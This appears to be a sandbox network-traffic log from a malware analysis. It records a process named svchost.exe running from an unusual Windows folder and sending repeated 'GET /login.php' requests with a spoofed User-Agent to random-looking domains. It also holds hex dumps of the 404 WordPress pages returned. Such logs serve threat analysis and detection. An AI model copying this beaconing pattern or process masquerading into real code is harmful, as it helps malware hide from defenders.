2024-11-11 17:13:26 UTC	412	IN	Data Raw: 37 63 61 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e Data Ascii: 7ca0<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
2024-11-11 17:13:26 UTC	1369	IN	Data Raw: 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d Data Ascii: }</style><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><m
2024-11-11 17:13:26 UTC	1369	IN	Data Raw: 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 Data Ascii: e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e
2024-11-11 17:13:26 UTC	1369	IN	Data Raw: 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 Data Ascii: ndefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e
2024-11-11 17:13:26 UTC	1369	IN	Data Raw: 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 Data Ascii: \|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/mi
2024-11-11 17:13:26 UTC	1369	IN	Data Raw: 65 72 20 2e 73 69 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 Data Ascii: er .site-description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2re
2024-11-11 17:13:26 UTC	1369	IN	Data Raw: 61 6e 67 65 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e Data Ascii: ange]::-webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .
2024-11-11 17:13:26 UTC	1369	IN	Data Raw: 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 Data Ascii: ry-content .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post
2024-11-11 17:13:26 UTC	1369	IN	Data Raw: 73 2d 76 69 73 69 62 6c 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 Data Ascii: s-visible,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,inp
2024-11-11 17:13:26 UTC	1369	IN	Data Raw: 2d 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 45 64 69 74 41 63 63 6f 75 6e 74 46 6f 72 6d 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 72 6f 77 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 49 6e 70 75 74 2e 69 6e 70 75 74 2d 74 65 78 74 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 61 73 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 75 6c 2e 70 61 67 65 2d 6e 75 6d 62 65 72 73 20 6c 69 20 61 3a 66 6f 63 75 73 2c 62 6f 64 79 20 23 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c Data Ascii: -content .woocommerce-EditAccountForm .woocommerce-form-row .woocommerce-Input.input-text:focus,.woocommerce .ast-woocommerce-container .woocommerce-pagination ul.page-numbers li a:focus,body #content .woocommerce form .form-row .select2-container--defaul

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	63317	188.114.96.3	443	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:13:27 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
2024-11-11 17:13:28 UTC	945	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:13:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gKlsR995DzG5lUgNDN%2B8RMuWE4k5DSE0%2FlC2pJe2wazBm4c8FVZRP0RrmsYYdCFEWFnmHUyzmzjbD4KZXNzzhRAWRk4gTlO8XpyXuQ8tUWQ6hDamt5GyzG8xkj06bQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fe9bbab36a2af-YUL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=11807&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=881&delivery_rate=245215&cwnd=32&unsent_bytes=0&cid=fa2a4285b92977dd&ts=1318&x=0"
2024-11-11 17:13:28 UTC	424	IN	Data Raw: 37 63 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e Data Ascii: 7cac<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
2024-11-11 17:13:28 UTC	1369	IN	Data Raw: 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 Data Ascii: <meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta property

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	63420	188.114.96.3	443	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:13:30 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Connection: Keep-Alive
2024-11-11 17:13:31 UTC	1093	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:13:31 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/" server-timing: amp_sanitizer;dur="48.9",amp_style_sanitizer;dur="21.9",amp_tag_and_attribute_sanitizer;dur="20.8",amp_optimizer;dur="23.6" cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A2bCc39d1Mt%2BpiwYAxEUM7BMb4FcwLsdFhAgMByRiwFC%2Bvk4MNUIPv9%2B5du1pJQR3574nSY14Z7%2FOmRZ7Ibu47H0mtdowYxVj2dKafznL6hI%2FHuV2QF%2BX9zKc7GuUg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fe9cd1e218099-NRT alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=154798&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=18726&cwnd=32&unsent_bytes=0&cid=790987abbe807eb3&ts=1691&x=0"
2024-11-11 17:13:31 UTC	276	IN	Data Raw: 37 63 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62 Data Ascii: 7c18<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
2024-11-11 17:13:31 UTC	1369	IN	Data Raw: 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 Data Ascii: charset="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{heigh
2024-11-11 17:13:31 UTC	1369	IN	Data Raw: 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f Data Ascii: rolling:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbo
2024-11-11 17:13:31 UTC	1369	IN	Data Raw: 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f Data Ascii: th:100%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-o
2024-11-11 17:13:31 UTC	1369	IN	Data Raw: 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b Data Ascii: amphtml-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;
